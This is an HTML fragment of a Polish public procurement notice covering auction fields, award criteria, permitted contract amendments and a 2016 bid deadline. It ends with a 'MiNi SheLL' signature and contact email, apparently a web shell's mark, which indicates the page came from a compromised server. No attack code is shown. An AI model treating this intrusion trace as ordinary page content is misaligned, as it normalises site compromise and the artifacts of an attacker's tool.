              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres rękojmi</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zakres  dopuszczalnych przez Zamawiającego zmian postanowień umowy.
1.	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty , na podstawie której  dokonano wyboru wykonawcy, chyba że zachodzi co najmniej jedna z następujących okoliczności:
1)Zmiany zostały przewidziane w ogłoszeniu o zamówieniu lub SIWZ w postaci 
   jednoznacznych postanowień umownych ,które określają ich zakres , w 
    szczególności możliwość zmiany wysokości wynagrodzenia wykonawcy i 
   charakter oraz warunki wprowadzania zmian,
2)Zmiany dotyczą realizacji dodatkowych dostaw, usług lub robót budowlanych  
     od dotychczasowego wykonawcy, nieobjętych zamówieniem podstawowym o 
     ile stały się niezbędne  i zostały spełnione  łącznie następujące warunki:  
a) zmiana wykonawcy nie może zostać dokonana z powodów ekonomicznych lub  
    technicznych, w szczególności dotyczących zamienności lub interpelacyjności  
    sprzętu, usług lub instalacji, zamówionych w ramach zamówienia   
    podstawowego
b)zmiana wykonawcy spowodowałaby istotna niedogodność lub znaczne  
    zwiększenie kosztów dla zamawiającego,
c)wartość każdej kolejnej zmiany nie przekracza 50% wartości zamówienia 
    pierwotnie w umowie lub umowie ramowej,
3) Zostały spełnione łącznie następujące warunki:
a) konieczność  zmiany umowy lub umowy ramowej spowodowana jest okolicznościami ,których Zamawiający działając z należytą starannością nie mógł przewidzieć,
b) wartość zmiany nie przekracza 50% wartości zamówienia określonej pierwotnie w umowie lub umowie ramowej ,
4)Wykonawcę , któremu Zamawiający udzielił zamówienia , ma zastąpić nowy Wykonawca :
a) na podstawie postanowień umownych , o których mowa w pkt.1 ,
b)w wyniku połączenia, podziału , przekształcenia , upadłości , restrukturyzacji lub nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa , o ile nowy Wykonawca spełnia warunki udziału w postępowaniu , nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą   innych istotnych zmian umowy,
c) w wyniku przejęcia przez Zamawiającego zobowiązań Wykonawcy wobec jego podwykonawców,
5)Zmiany niezależnie od ich wartości nie są istotne w rozumieniu ust.1 e ustawy Pzp.
6.Łączna wartość zmian jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art.11 ust.8 i jest mniejsza od 10 % wartości zamówienia określonej pierwotnie w umowie w przypadku zamówień na usługi lub dostawy albo, w przypadku zamówień na roboty budowlane  jest mniejsza od 15 % wartości zamówienia określonej w pierwotnej umowie.

2.Zmiany w umowie dotyczyć mogą również:
    1)Zmiany kluczowego personelu Wykonawcy lub Zamawiającego oraz 
         Podwykonawców w przypadków zaistnienia okoliczności uzasadniających zmianę   
         (np. stan zdrowia ,rezygnacja z pracy, likwidacja firmy podwykonawcy). Jeżeli   
          zmiana lub rezygnacja z podwykonawcy dotyczy podmiotu na którego zasoby 
          wykonawca powoływał się na zasadach określonych w art.22a.ust.1 Pzp w celu 
          wykazania spełnienia warunków udziału w postępowaniu , wykonawca jest 
          zobowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub 
          wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca 
          na którego zasoby wykonawca powoływał się w trakcie postępowania o udzielenie 
          zamówienia.
2)Zmiany terminu realizacji.
      Strony mają prawo do przedłużenia terminu zakończenia robót o okres trwania 
       przyczyn z powodu których będzie zagrożenie terminu zakończenia robót w 
       następujących sytuacjach:
-     jeżeli przyczyny z powodu których będzie zagrożone dotrzymanie terminu  
       zakończenia robót będą następstwem okoliczności za które odpowiedzialność   
        ponosi Zamawiający, w szczególności będą następstwem nieterminowego    
        przekazania  terenu budowy
-      gdy wystąpią niekorzystne warunki atmosferyczne uniemożliwiające wykonanie 
       prawidłowe robót, w szczególności   z powodu technologii realizacji prac określonej :
        umową, normami lub innymi przepisami wymagających konkretnych warunków  
        atmosferycznych , jeżeli konieczność wykonania prac w tym okresie nie jest 
        następstwem okoliczności za które wykonawca ponosi odpowiedzialność,
-    gdy wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych 
      do wykonania przedmiotu umowy ze względu na zasady wiedzy technicznej oraz   
       udzielenia zamówień dodatkowych które wstrzymują lub opóźniają realizację  
      przedmiotu umowy,
-     przypadku wystąpienia siły wyższej lub nieprzewidzianych zdarzeń losowych 
      uniemożliwiających wykonanie przedmiotu umowy.
3.Zmiany wynikające ze zmiany podatku od towarów i usług(VAT) lub innych podatków
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 31/10/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com